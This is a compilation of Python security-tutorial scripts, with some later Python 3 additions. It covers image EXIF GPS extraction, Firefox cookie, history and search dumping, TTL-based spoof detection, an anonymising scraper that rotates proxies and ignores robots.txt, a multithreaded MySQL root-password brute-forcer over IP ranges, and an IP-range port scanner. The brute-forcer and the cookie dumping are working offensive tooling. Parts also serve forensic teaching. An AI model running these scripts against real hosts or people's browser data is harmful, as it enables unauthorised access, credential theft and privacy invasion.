# Find the images on a web page
def findimages(url):
    print('[+] finding images on ' + url)
    # Read the HTML document
    urlcontent = urllib.request.urlopen(url).read()
    # Create a BeautifulSoup object
    soup = BeautifulSoup(urlcontent, "lxml")
    # Find every img tag
    imgtags = soup.find_all('img')
    return imgtags

# encoding: utf-8

# Required libraries
import urllib.request
from os.path import basename
from urllib.parse import urlsplit, urljoin

# Download an image
def downloadimage(imgtag, url):
    try:
        print('[+] downloading image...')
        # Image address (may be relative to the page URL)
        imgsrc = imgtag['src']
        # Fetch the image content
        imgcontent = urllib.request.urlopen(urljoin(url, imgsrc)).read()
        # File name is the last path component of the src URL
        imgfilename = basename(urlsplit(imgsrc)[2])
        imgfile = open(imgfilename, 'wb')
        # Write the image content
        imgfile.write(imgcontent)
        imgfile.close()
        return imgfilename
    except Exception:
        return ''

# encoding: utf-8

from PIL import Image
from PIL.ExifTags import TAGS

def testforexif(imgfilename):
    try:
        exifdata = {}
        imgfile = Image.open(imgfilename)
        # Read the file's EXIF metadata
        info = imgfile._getexif()
        if info:
            # Walk the EXIF tags looking for GPSInfo
            for (tag, value) in info.items():
                decoded = TAGS.get(tag, tag)
                exifdata[decoded] = value
            exifgps = exifdata.get('GPSInfo')
            if exifgps:
                print('[*] ' + imgfilename + ' contains GPS metadata')
    except Exception:
        pass

# encoding: utf-8

# Required libraries
import sys
import urllib.request
import optparse
from bs4 import BeautifulSoup
from urllib.parse import urlsplit, urljoin
from os.path import basename
from PIL import Image
from PIL.ExifTags import TAGS

# Find the image tags
def findimages(url):
    print('[+] finding images on ' + url)
    # Read the HTML document
    urlcontent = urllib.request.urlopen(url).read()
    # Create a BeautifulSoup object
    soup = BeautifulSoup(urlcontent, "lxml")
    # Find every img tag
    imgtags = soup.find_all('img')
    return imgtags

# Download an image
def downloadimage(imgtag, url):
    try:
        print('[+] downloading image...')
        # Image address (may be relative to the page URL)
        imgsrc = imgtag['src']
        # Fetch the image content
        imgcontent = urllib.request.urlopen(urljoin(url, imgsrc)).read()
        imgfilename = basename(urlsplit(imgsrc)[2])
        imgfile = open(imgfilename, 'wb')
        # Write the image content
        imgfile.write(imgcontent)
        imgfile.close()
        return imgfilename
    except Exception:
        return ''

# Check the metadata for GPSInfo
def testforexif(imgfilename):
    try:
        exifdata = {}
        imgfile = Image.open(imgfilename)
        # Read the file's EXIF metadata
        info = imgfile._getexif()
        if info:
            # Walk the EXIF tags looking for GPSInfo
            for (tag, value) in info.items():
                decoded = TAGS.get(tag, tag)
                exifdata[decoded] = value
            exifgps = exifdata.get('GPSInfo')
            if exifgps:
                print('[*] ' + imgfilename + ' contains GPS metadata')
    except Exception:
        pass

# Entry point
def main():
    parser = optparse.OptionParser('usage %prog -u <target url>')
    parser.add_option('-u', dest='url', type='string', help='specify url address')
    (options, args) = parser.parse_args()
    url = options.url
    if url is None:
        print(parser.usage)
        sys.exit(0)
    else:
        imgtags = findimages(url)
        for imgtag in imgtags:
            imgfilename = downloadimage(imgtag, url)
            testforexif(imgfilename)

if __name__ == "__main__":
    main()

9. Parsing the Firefox sqlite3 databases

# -*- coding: utf-8 -*-

import sqlite3  # library import

def printDownloads(downloadDB):  # show the download history
    conn = sqlite3.connect(downloadDB)  # connect to the database
    c = conn.cursor()   # create a cursor
    c.execute('SELECT name,source,datetime(endTime/1000000,\'unixepoch\') FROM moz_downloads;')  # run the query
    print('\n[*] --- Files Downloaded ---')
    for row in c:
        print('[+] File: ' + str(row[0]) + ' from source: ' + str(row[1]) + ' at: ' + str(row[2]))

def main():
    downloadDB = 'downloads.sqlite'
    printDownloads(downloadDB)

if __name__ == '__main__':
    main()

import sqlite3  # library import

def printCookies(cookiesDB):  # read the contents of the cookie database
    try:
        conn = sqlite3.connect(cookiesDB)  # connect to the database
        c = conn.cursor()   # create a cursor
        c.execute('SELECT host,name,value FROM moz_cookies;')  # run the query
        print('\n[*] --- Found Cookies ---')
        for row in c:
            host = str(row[0])
            name = str(row[1])
            value = str(row[2])
            print('[+] Host: ' + host + ' name: ' + name + ' Value: ' + value)
    except Exception as e:
        if 'encrypted' in str(e):
            print('\n[*] Error reading your cookies database.')
            print('[*] Upgrade your Python-sqlite3 Library')

def main():
    cookiesDB = 'cookies.sqlite'
    printCookies(cookiesDB)

if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-

import sys
import sqlite3

# Read the browsing history
def printHistory(placesDB):
    try:
        conn = sqlite3.connect(placesDB)
        c = conn.cursor()
        # Run the query (the visit table's foreign key column is place_id)
        c.execute('select url, datetime(visit_date/1000000, \'unixepoch\') from moz_places,moz_historyvisits where visit_count > 0 and moz_places.id == moz_historyvisits.place_id;')
        print('\n[*] -- Found History --')
        for row in c:
            url = str(row[0])
            date = str(row[1])
            print('[+] ' + date + '  -Visited: ' + url)
    except Exception as e:
        if 'encrypted' in str(e):
            print('\n[*] Error reading your places database.')
            print('[*] Upgrade your Python-sqlite3 Library.')
            sys.exit(0)

def main():
    placesDB = 'places.sqlite'
    printHistory(placesDB)

if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-

import sqlite3
import re
import urllib

# pull Google search terms out of the browsing history
def printGoogle(placesDB):
    try:
        conn = sqlite3.connect(placesDB)
        c = conn.cursor()
        # join each visit to its place record
        c.execute('select url, datetime(visit_date/1000000, \'unixepoch\') from moz_places,moz_historyvisits where visit_count > 0 and moz_places.id == moz_historyvisits.place_id;')
        print '\n[*] -- Found Google --'
        for row in c:
            url = str(row[0])
            date = str(row[1])
            if 'google' in url.lower():
                r = re.findall(r'[?&]q=([^&]*)', url)  # the q= parameter, whether or not another one follows it
                if r:
                    search = urllib.unquote_plus(r[0])  # '+' and %XX escapes back to the typed text
                    print '[+]' + date + '  -Searched For: ' + search
        conn.close()
    except Exception, e:
        print e

def main():
    placesDB = 'places.sqlite'
    printGoogle(placesDB)

if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-

import optparse
import os
import sqlite3
import re
import urllib

def printDownloads(downloadDB):  # list the download history
    conn = sqlite3.connect(downloadDB)  # connect to the database
    c = conn.cursor()   # create a cursor
    c.execute('SELECT name,source,datetime(endTime/1000000,\'unixepoch\') FROM moz_downloads;')  # run the query
    print '\n[*] --- Files Downloaded ---'
    for row in c:
        print '[+] File: ' + str(row[0]) + ' from source: ' + str(row[1]) + ' at: ' + str(row[2])
    conn.close()

def printCookies(cookiesDB):  # dump the cookie database
    try:
        conn = sqlite3.connect(cookiesDB)  # connect to the database
        c = conn.cursor()   # create a cursor
        c.execute('SELECT host,name,value FROM moz_cookies;')  # run the query
        print '\n[*] --- Found Cookies ---'
        for row in c:
            host = str(row[0])
            name = str(row[1])
            value = str(row[2])
            print '[+] Host: ' + host + ' name: ' + name + ' Value: ' + value
        conn.close()
    except Exception, e:
        if 'encrypted' in str(e):
            print '\n[*] Error reading your cookies database. '
            print '[*] Upgrade your Python-sqlite3 Library'


def printHistory(placesDB):  # dump the browsing history
    try:
        conn = sqlite3.connect(placesDB)
        c = conn.cursor()
        # join each visit to its place record
        c.execute('select url, datetime(visit_date/1000000, \'unixepoch\') from moz_places,moz_historyvisits where visit_count > 0 and moz_places.id == moz_historyvisits.place_id;')
        print '\n[*] -- Found History --'
        for row in c:
            url = str(row[0])
            date = str(row[1])
            print '[+]' + date + '  -Visited: ' + url
        conn.close()
    except Exception, e:
        if 'encrypted' in str(e):
            print '\n[*] Error reading your places database.'
            print '[*] Upgrade your Python-sqlite3 Library.'
            exit(0)

def printGoogle(placesDB):  # pull Google search terms out of the history
    try:
        conn = sqlite3.connect(placesDB)
        c = conn.cursor()
        # join each visit to its place record
        c.execute('select url, datetime(visit_date/1000000, \'unixepoch\') from moz_places,moz_historyvisits where visit_count > 0 and moz_places.id == moz_historyvisits.place_id;')
        print '\n[*] -- Found Google --'
        for row in c:
            url = str(row[0])
            date = str(row[1])
            if 'google' in url.lower():
                r = re.findall(r'[?&]q=([^&]*)', url)  # the q= parameter, whether or not another one follows it
                if r:
                    search = urllib.unquote_plus(r[0])  # '+' and %XX escapes back to the typed text
                    print '[+]' + date + '  -Searched For: ' + search
        conn.close()
    except Exception, e:
        print e

def main():
    parser = optparse.OptionParser('Usage %prog -p <firefox profile path>')
    parser.add_option('-p', dest='pathName', type='string', help='specify firefox profile path')
    (options, args) = parser.parse_args()
    pathName = options.pathName
    if pathName == None:
        print parser.usage
        exit(0)
    elif os.path.isdir(pathName) == False:
        print '[!] Path Does Not Exist: ' + pathName
        exit(0)
    else:
        downloadDB = os.path.join(pathName, 'downloads.sqlite')
        if os.path.isfile(downloadDB):
            printDownloads(downloadDB)
        else:
            print '[!] Downloads DB Does Not Exist: ' + downloadDB
        cookiesDB = os.path.join(pathName, 'cookies.sqlite')
        if os.path.isfile(cookiesDB):
            printCookies(cookiesDB)
        else:
            print '[!] Cookies DB Does Not Exist: ' + cookiesDB
        placesDB = os.path.join(pathName, 'places.sqlite')
        if os.path.isfile(placesDB):
            printHistory(placesDB)
            printGoogle(placesDB)
        else:
            print '[!] Places DB Does Not Exist: ' + placesDB

if __name__ == '__main__':
    main()
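Added example (Python 3, not code from the original page): the history and Google-search queries above run against an in-memory SQLite database built to mimic places.sqlite. The schema and sample visits are constructed here with only the columns the queries need; the visit table's foreign key is named place_id as in real Firefox profiles, and the search term is taken from the URL with parse_qs instead of a regex so '+' and percent-escapes decode correctly.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed sample visits: (url, visit_date) with visit_date in microseconds
# since the Unix epoch, which is how Firefox stores PRTime in places.sqlite.
SAMPLE_VISITS = [
    ("https://www.google.com/search?q=sqlite+forensics&oq=sqlite", 1_700_000_000_000_000),
    ("https://example.org/login", 1_700_000_060_000_000),
    ("https://www.google.com/search?hl=en&q=places.sqlite%20schema", 1_700_000_120_000_000),
]

# The join the scripts above run, ordered so the output is chronological.
HISTORY_SQL = """
SELECT p.url, datetime(v.visit_date / 1000000, 'unixepoch')
FROM moz_places AS p JOIN moz_historyvisits AS v ON p.id = v.place_id
WHERE p.visit_count > 0
ORDER BY v.visit_date
"""

def build_places_db(visits=SAMPLE_VISITS):
    """Create an in-memory stand-in for places.sqlite (constructed schema, only
    the columns the queries use) and load the sample visits into it."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, visit_count INTEGER);
        CREATE TABLE moz_historyvisits (id INTEGER PRIMARY KEY, place_id INTEGER, visit_date INTEGER);
    """)
    for url, visit_date in visits:
        cur = conn.execute("INSERT INTO moz_places (url, visit_count) VALUES (?, 1)", (url,))
        conn.execute("INSERT INTO moz_historyvisits (place_id, visit_date) VALUES (?, ?)",
                     (cur.lastrowid, visit_date))
    conn.commit()
    return conn

def history(conn):
    """Return [(visit_time_utc, url), ...] in visit order."""
    return [(when, url) for url, when in conn.execute(HISTORY_SQL)]

def search_term(url):
    """Return the 'q' parameter of a Google search URL with '+' and %XX escapes
    decoded, or None if the URL is not a Google search."""
    parts = urlsplit(url)
    if "google" not in parts.netloc.lower():
        return None
    terms = parse_qs(parts.query).get("q")
    return terms[0] if terms else None

def google_searches(conn):
    """Return [(visit_time_utc, search_term), ...] for visits that were Google searches."""
    out = []
    for when, url in history(conn):
        term = search_term(url)
        if term is not None:
            out.append((when, term))
    return out

if __name__ == "__main__":
    db = build_places_db()
    for when, url in history(db):
        print(f"[+] {when}  -Visited: {url}")
    for when, term in google_searches(db):
        print(f"[+] {when}  -Searched For: {term}")
```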

10、Parsing the TTL field value

# -*- coding: utf-8 -*-

from scapy.all import *  # use the scapy library

def testTTL(pkt):
    try:
        if pkt.haslayer(IP):    # only packets that carry an IP layer
            ipsrc = pkt.getlayer(IP).src    # extract the source IP address
            ttl = str(pkt.ttl)  # extract the TTL and print both
            print '[+] Pkt Received From: ' + ipsrc + ' with TTL: ' + ttl
    except:
        pass

def main():
    sniff(prn=testTTL, store=0)  # sniff packets

if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-

from scapy.all import *  # use the scapy library
from IPy import IP as IPTEST    # import IPy's IP class under another name so it does not clash with scapy's IP

ttlValues = {}  # TTL learned for each source address
THRESH = 5  # hop-count deviation tolerated before a packet is flagged

def checkTTL(ipsrc, ttl):
    if IPTEST(ipsrc).iptype() == 'PRIVATE':  # skip private (RFC 1918) source addresses
        return
    if ipsrc not in ttlValues:
        pkt = sr1(IP(dst=ipsrc)/ICMP(), retry=0, timeout=1, verbose=0)  # probe the source to learn its real TTL
        if pkt is None:  # no reply, so there is nothing to compare against
            return
        ttlValues[ipsrc] = pkt.ttl
    if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH:
        print '\n[!] Detected Possible Spoofed Packet From: ' + ipsrc
        print '[!] TTL: ' + ttl + ', Actual TTL: ' + str(ttlValues[ipsrc])

# -*- coding: utf-8 -*-

import optparse
from scapy.all import *  # use the scapy library
from IPy import IP as IPTEST    # import IPy's IP class under another name so it does not clash with scapy's IP

ttlValues = {}  # TTL learned for each source address
THRESH = 5  # hop-count deviation tolerated before a packet is flagged

def checkTTL(ipsrc, ttl):
    if IPTEST(ipsrc).iptype() == 'PRIVATE':  # skip private (RFC 1918) source addresses
        return
    if ipsrc not in ttlValues:
        pkt = sr1(IP(dst=ipsrc)/ICMP(), retry=0, timeout=1, verbose=0)  # probe the source to learn its real TTL
        if pkt is None:  # no reply, so there is nothing to compare against
            return
        ttlValues[ipsrc] = pkt.ttl
    if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH:
        print '\n[!] Detected Possible Spoofed Packet From: ' + ipsrc
        print '[!] TTL: ' + ttl + ', Actual TTL: ' + str(ttlValues[ipsrc])

def testTTL(pkt):
    try:
        if pkt.haslayer(IP):    # only packets that carry an IP layer
            ipsrc = pkt.getlayer(IP).src    # extract the source IP address
            ttl = str(pkt.ttl)  # extract the TTL and print both
            print '[+] Pkt Received From: ' + ipsrc + ' with TTL: ' + ttl
            checkTTL(ipsrc, ttl)  # compare against the TTL learned for this source
    except:
        pass

def main():
    global THRESH
    parser = optparse.OptionParser("usage %prog -i <interface> -t <thresh>")
    parser.add_option('-i', dest='iface', type='string', help='specify network interface')
    parser.add_option('-t', dest='thresh', type='int', help='specify threshold count')
    (options, args) = parser.parse_args()
    if options.iface == None:
        conf.iface = 'eth0'
    else:
        conf.iface = options.iface
    if options.thresh != None:
        THRESH = options.thresh
    else:
        THRESH = 5
    try:
        sniff(prn=testTTL, store=0)  # sniff packets
    except Exception, e:
        print e

if __name__ == '__main__':
    main()
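Added example (Python 3, not code from the original page): the checkTTL() comparison run offline against a constructed packet stream. The sr1() ICMP probe is replaced by a constructed table of probed TTLs, the private-address check uses the ipaddress module, and hop_distance() goes one step beyond the scripts above by estimating the hop count from the usual initial TTLs.

```python
import ipaddress

THRESH = 5  # hop-count deviation tolerated before a packet is flagged
INITIAL_TTLS = (64, 128, 255)  # starting TTLs used by common operating systems

# RFC 1918 ranges, skipped like IPy's 'PRIVATE' check in checkTTL()
PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed stand-in for the sr1() ICMP probe: the TTL seen on a reply that
# the monitor solicited from each source.
PROBED_TTL = {
    "203.0.113.10": 54,   # 64 - 10 hops
    "198.51.100.7": 118,  # 128 - 10 hops
}

# Constructed packet stream: (source address, TTL seen on the wire).
OBSERVED = [
    ("203.0.113.10", 54),   # matches the probe
    ("203.0.113.10", 52),   # 2 hops off, within THRESH
    ("203.0.113.10", 64),   # claims to be 0 hops away: likely spoofed
    ("198.51.100.7", 241),  # a 255-based TTL from a host that probed as 128-based
    ("10.0.0.5", 30),       # private address: not checked
    ("192.0.2.99", 64),     # never probed: no baseline to compare against
]

def is_private(src):
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in PRIVATE_NETS)

def hop_distance(ttl):
    """Estimate hops travelled by assuming the nearest initial TTL at or above ttl."""
    initial = next(i for i in INITIAL_TTLS if ttl <= i)
    return initial - ttl

def check_ttl(src, ttl, baseline, thresh=THRESH):
    """Classify one packet as 'private', 'unknown', 'ok' or 'suspicious', paired
    with the expected TTL (None when there is nothing to compare against)."""
    if is_private(src):
        return ("private", None)
    expected = baseline.get(src)
    if expected is None:
        return ("unknown", None)
    if abs(int(ttl) - int(expected)) > thresh:
        return ("suspicious", expected)
    return ("ok", expected)

def scan(observed=OBSERVED, baseline=PROBED_TTL, thresh=THRESH):
    """Run check_ttl over a packet stream; returns [(src, ttl, verdict, expected), ...]."""
    return [(src, ttl) + check_ttl(src, ttl, baseline, thresh) for src, ttl in observed]

def suspicious_sources(observed=OBSERVED, baseline=PROBED_TTL, thresh=THRESH):
    """Sorted list of source addresses with at least one suspicious packet."""
    return sorted({src for src, _, verdict, _ in scan(observed, baseline, thresh) if verdict == "suspicious"})

if __name__ == "__main__":
    for src, ttl, verdict, expected in scan():
        extra = f" (expected {expected}, ~{hop_distance(ttl)} hops)" if expected else ""
        print(f"[+] Pkt Received From: {src} with TTL: {ttl} -> {verdict}{extra}")
```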

11、Fetching web pages with anonBrowser

# -*- coding: utf-8 -*-

import mechanize, cookielib, random, time

class anonBrowser(mechanize.Browser):

    def __init__(self, proxies=[], user_agents=[]):
        mechanize.Browser.__init__(self)
        self.set_handle_robots(False)
        self.proxies = proxies
        self.user_agents = user_agents + ['Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0']
        self.cookie_jar = cookielib.LWPCookieJar()
        self.set_cookiejar(self.cookie_jar)
        self.anonymize()

    def clear_cookies(self):
        self.cookie_jar = cookielib.LWPCookieJar()
        self.set_cookiejar(self.cookie_jar)

    def change_user_agent(self):
        index = random.randrange(0, len(self.user_agents))
        self.addheaders = [('User-agent', (self.user_agents[index]))]

    def change_proxy(self):
        if self.proxies:
            index = random.randrange(0, len(self.proxies))
            self.set_proxies({'http': self.proxies[index]})

    def anonymize(self, sleep=False):
        self.clear_cookies()
        self.change_user_agent()
        self.change_proxy()
        if sleep:
            time.sleep(60)

# -*- coding: utf-8 -*-

from anonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparse
import re

def printLinks(url):
    ab = anonBrowser()
    ab.anonymize()
    page = ab.open(url)
    html = page.read()
    try:
        print '[+] Printing Links From Regex.'
        link_finder = re.compile('href="(.*?)"')
        links = link_finder.findall(html)
        for link in links:
            print link
    except:
        pass
    try:
        print '\n[+] Printing Links From BeautifulSoup.'
        soup = BeautifulSoup(html)
        links = soup.findAll(name='a')
        for link in links:
            if link.has_key('href'):
                print link['href']
    except:
        pass

def main():
    parser = optparse.OptionParser('usage %prog -u <target url>')
    parser.add_option('-u', dest='tgturl', type='string', help='specify target url')
    (options, args) = parser.parse_args()
    url = options.tgturl
    if url == None:
        print parser.usage
        exit(0)
    else:
        printLinks(url)

if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-

from anonBrowser import *
from BeautifulSoup import BeautifulSoup
from urlparse import urljoin
import os
import optparse
import re


def mirrorImages(url, dir):
    ab = anonBrowser()
    ab.anonymize()
    html = ab.open(url).read()
    soup = BeautifulSoup(html)
    image_tags = soup.findAll('img')
    for image in image_tags:
        src = urljoin(url, image['src'])  # resolve relative image paths against the page URL
        filename = re.sub(r'^https?://', '', src)  # drop the scheme (lstrip would strip characters, not a prefix)
        filename = os.path.join(dir, filename.replace('/', '_'))
        print '[+] Saving ' + str(filename)
        data = ab.open(src).read()
        ab.back()
        save = open(filename, 'wb')
        save.write(data)
        save.close()

def main():
    parser = optparse.OptionParser('usage %prog -u <target url> -d <destination directory>')
    parser.add_option('-u', dest='tgturl', type='string', help='specify target url')
    parser.add_option('-d', dest='dir', type='string', help='specify destination directory')
    (options, args) = parser.parse_args()
    url = options.tgturl
    dir = options.dir
    if url == None or dir == None:
        print parser.usage
        exit(0)
    else:
        try:
            mirrorImages(url, dir)
        except Exception, e:
            print '[-] Error Mirroring Images '
            print '[-]  ' + str(e)

if __name__ == '__main__':
    main()
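Added example (Python 3, standard library only, not code from the original page): the link and image extraction that printLinks() and mirrorImages() do, run over a constructed HTML page. It shows what the href="..." regex misses, resolves relative URLs, keeps only http(s) links, and derives a file name that cannot escape the destination directory.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit
import re

# Constructed sample page: a single-quoted href, an <a> without href, a relative
# image path and a javascript: link that a mirroring tool must not follow.
SAMPLE_HTML = """
<html><body>
<a href="https://example.org/about">About</a>
<a href='/news/today'>News</a>
<a name="anchor-only">No link</a>
<a href="javascript:alert(1)">Bad</a>
<img src="/static/logo.png"><img src="https://cdn.example.org/a/b.png" alt="x">
</body></html>
"""

class LinkCollector(HTMLParser):
    """Collect <a href> and <img src> values, as BeautifulSoup's findAll did above."""
    def __init__(self):
        super().__init__()
        self.links, self.images = [], []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self.links.append(attrs["href"])
        elif tag == "img" and attrs.get("src"):
            self.images.append(attrs["src"])

def regex_links(html):
    """The regex from printLinks(): only double-quoted href attributes match."""
    return re.findall(r'href="(.*?)"', html)

def parsed_links(html, base_url):
    """Parser-based links, made absolute against base_url; only http(s) targets are kept."""
    p = LinkCollector()
    p.feed(html)
    out = []
    for href in p.links:
        absolute = urljoin(base_url, href)
        if urlsplit(absolute).scheme in ("http", "https"):
            out.append(absolute)
    return out

def parsed_images(html, base_url):
    """Image URLs, made absolute so relative src values can be fetched."""
    p = LinkCollector()
    p.feed(html)
    return [urljoin(base_url, src) for src in p.images]

def safe_filename(image_url):
    """Flatten an image URL into one file name as mirrorImages() does, but without
    lstrip('http://') (which strips characters, not a prefix) and with path
    separators and '..' neutralised so the name stays inside the target directory."""
    parts = urlsplit(image_url)
    name = (parts.netloc + parts.path).replace("/", "_").replace("\\", "_")
    name = name.replace("..", "_")
    return name.lstrip("._") or "index"

if __name__ == "__main__":
    base = "https://example.org/news/"
    print("regex:", regex_links(SAMPLE_HTML))
    print("parsed:", parsed_links(SAMPLE_HTML, base))
    for img in parsed_images(SAMPLE_HTML, base):
        print("image:", img, "->", safe_filename(img))
```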

12、Multithreaded MySQL password brute-forcing

# -*- coding: utf-8 -*-

import threading
import argparse
import socket
import Queue
import netaddr
import MySQLdb
import time
import sys

class Mysqlfuzz:

    def __init__(self, addr, tnum):
        self.scanque = Queue.Queue()
        self.tnum = tnum
        self.tmpnum = tnum
        self.lock = threading.Lock()
        self.openlist = []
        if addr.find("-") != -1:     # address range given as start-end
            for ip in netaddr.IPRange(addr.split("-")[0], addr.split("-")[1]):
                self.scanque.put(ip)
        else:                        # otherwise CIDR notation
            for ip in netaddr.IPNetwork(addr).iter_hosts():
                self.scanque.put(ip)
        self.qsize = self.scanque.qsize()  # queue size
        for i in range(tnum):  # start the port-scanning threads
            t = threading.Thread(target=self.ScanPort)
            t.setDaemon(True)
            t.start()
        while self.tmpnum > 0:
            time.sleep(1.0)
        print "[*]:cracking MySQL Password ..."
        with open("pass.txt", "r") as file:  # load the wordlist
            data = file.readlines()
        for ip in self.openlist:  # try each password against each open host
            for line in data:
                self.scanque.put(line.strip())
            for i in range(tnum):
                t = threading.Thread(target=self.Crack, args=(ip,))
                t.setDaemon(True)
                t.start()
            while self.scanque.qsize() > 0:
                time.sleep(1.0)

    def Crack(self, ip):  # attempt to connect to the target MySQL server
        while self.scanque.qsize() > 0:
            try:
                password = self.scanque.get()
                conn = MySQLdb.connect(host=ip, user='root', passwd=password, db='test', port=3306, connect_timeout=4)
                self.lock.acquire()
                msg = "[+]:%s Username: root Password is: %s" % (ip, password)
                print msg
                output = open('good.txt', 'a')
                output.write(msg + "\r\n")
                output.close()
                self.lock.release()
                break
            except:
                pass

    def ScanPort(self):  # check whether port 3306 is open on the target
        while self.scanque.qsize() > 0:
            try:
                ip = self.scanque.get()
                s = socket.socket()
                s.settimeout(4)
                s.connect((str(ip), 3306))
                self.lock.acquire()
                print ip, " 3306 open"
                self.openlist.append(str(ip))
                self.lock.release()
            except:
                pass
        self.tmpnum -= 1

if __name__ == "__main__":  # parse the command line and start
    parse = argparse.ArgumentParser(description="mysqlfuzz")
    parse.add_argument('-a', '--addr', type=str, help="ipaddress")
    parse.add_argument('-t', '--thread', type=int, help="ThreadNumber", default=100)
    args = parse.parse_args()
    if not args.addr:
        parse.print_help()
        sys.exit(0)
    addr = args.addr
    tnum = args.thread
    Mysqlfuzz(addr, tnum)

13、Port scanning an IP range

# -*- coding: utf-8 -*-

from PyQt4 import QtCore, QtGui
import sys
import socket
import threading
import thread
import ini  # the INI helper module (ini.py, listed below)
import time  # timestamps and delays

socket.setdefaulttimeout(10)    # global default socket timeout

try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    _fromUtf8 = lambda s: s

class Ui_Form(object):

    def setupUi(self, Form):
        Form.setObjectName(_fromUtf8("Form"))
        Form.resize(272, 482)
        self.textEdit = QtGui.QTextEdit(Form)
        self.textEdit.setGeometry(QtCore.QRect(60, 10, 201, 31))
        self.textEdit.setObjectName(_fromUtf8("textEdit"))
        self.textEdit_2 = QtGui.QTextEdit(Form)
        self.textEdit_2.setGeometry(QtCore.QRect(60, 50, 201, 31))
        self.textEdit_2.setObjectName(_fromUtf8("textEdit_2"))
        self.textEdit_3 = QtGui.QTextEdit(Form)
        self.textEdit_3.setGeometry(QtCore.QRect(60, 90, 81, 31))
        self.textEdit_3.setObjectName(_fromUtf8("textEdit_3"))
        self.label = QtGui.QLabel(Form)
        self.label.setGeometry(QtCore.QRect(10, 30, 54, 12))
        self.label.setObjectName(_fromUtf8("label"))
        self.label_2 = QtGui.QLabel(Form)
        self.label_2.setGeometry(QtCore.QRect(10, 70, 54, 12))
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.label_3 = QtGui.QLabel(Form)
        self.label_3.setGeometry(QtCore.QRect(20, 110, 54, 12))
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.pushButton = QtGui.QPushButton(Form)
        self.pushButton.setGeometry(QtCore.QRect(160, 90, 101, 31))
        self.pushButton.setObjectName(_fromUtf8("pushButton"))
        self.textEdit_4 = QtGui.QTextEdit(Form)
        self.textEdit_4.setGeometry(QtCore.QRect(10, 150, 251, 321))
        self.textEdit_4.setObjectName(_fromUtf8("textEdit_4"))
        self.label_4 = QtGui.QLabel(Form)
        self.label_4.setGeometry(QtCore.QRect(70, 130, 251, 25))
        self.label_4.setObjectName(_fromUtf8("label_4"))
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
        QtCore.QObject.connect(self.pushButton, QtCore.SIGNAL(_fromUtf8("clicked()")), self.test)

    def test(self):
        thread.start_new_thread(self.mess, ())

    def mess(self):
        ip1 = str(self.textEdit.toPlainText())  # start IP
        ip2 = str(self.textEdit_2.toPlainText())  # end IP
        port = str(self.textEdit_3.toPlainText())  # port
        ini.ini_write(ip1, ip2, port)  # update the INI file
        self.textEdit_4.append(u"扫描结果会保存在程序目录下ip.txt")
        list_ip = self.gen_ip(self.ip2num(ip1), self.ip2num(ip2))
        self.pushButton.setEnabled(0)  # disable the button while scanning
        self.textEdit_4.append(u"需要扫描" + str(len(list_ip)) + u"个IP")
        I1 = 0  # index into the IP list
        ip = 0  # IPs started since the INI file was last updated
        self.textEdit_4.append(u"开始扫描IP--" + time.strftime('%Y.%m.%d-%H.%M.%S'))
        while I1 < len(list_ip):
            if ip >= 200:
                ini.ini_write(list_ip[I1], ini.IP2, port)  # checkpoint progress every 200 IPs
                ip = 0
            print list_ip[I1]
            ip = ip + 1
            time.sleep(0.1)  # pace thread creation
            thread.start_new_thread(self.socket_port, (list_ip[I1], int(port)))
            I1 = I1 + 1
        self.textEdit_4.append(u"IP扫描完成--" + time.strftime('%Y.%m.%d-%H.%M.%S'))
        self.pushButton.setEnabled(1)  # re-enable the button

    def socket_port(self, ip, PORT):
        try:
            self.label_4.setText(u"正在扫描IP:" + str(ip) + u":" + str(PORT))
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, PORT))
            s.close()
            self.textEdit_4.append(str(ip) + u":" + str(PORT) + u"端口开放")
            xxx = open('ip.txt', 'a')  # append, so earlier results are not overwritten
            xxx.write(str(ip))
            xxx.write('\n')
            xxx.close()
        except:
            print ip, u":", PORT, u"端口未开放"

    def ip2num(self, ip):
        ip = [int(x) for x in ip.split('.')]
        return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]

    def num2ip(self, num):
        if num >= IPend:
            self.textEdit_4.append(u"IP导入数组完成")
        return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff)

    def gen_ip(self, Aip1, Aip2):  # return the list of IPs to scan
        global IPend
        IPend = Aip2
        return [self.num2ip(num) for num in range(Aip1, Aip2 + 1) if num & 0xff]

    def iniA(self):
        ini.ini_get()  # read the INI file
        self.textEdit.setPlainText(ini.IP1)
        self.textEdit_2.setPlainText(ini.IP2)
        self.textEdit_3.setPlainText(ini.port)

    def retranslateUi(self, Form):
        Form.setWindowTitle(QtGui.QApplication.translate("Form", "Simple", None, QtGui.QApplication.UnicodeUTF8))
        self.label.setText(QtGui.QApplication.translate("Form", "开始IP:", None, QtGui.QApplication.UnicodeUTF8))
        self.label_2.setText(QtGui.QApplication.translate("Form", "结束IP:", None, QtGui.QApplication.UnicodeUTF8))
        self.label_3.setText(QtGui.QApplication.translate("Form", "端口:", None, QtGui.QApplication.UnicodeUTF8))
        self.pushButton.setText(QtGui.QApplication.translate("Form", "开始扫描", None, QtGui.QApplication.UnicodeUTF8))
        self.label_4.setText(QtGui.QApplication.translate("Form", "扫描结果", None, QtGui.QApplication.UnicodeUTF8))

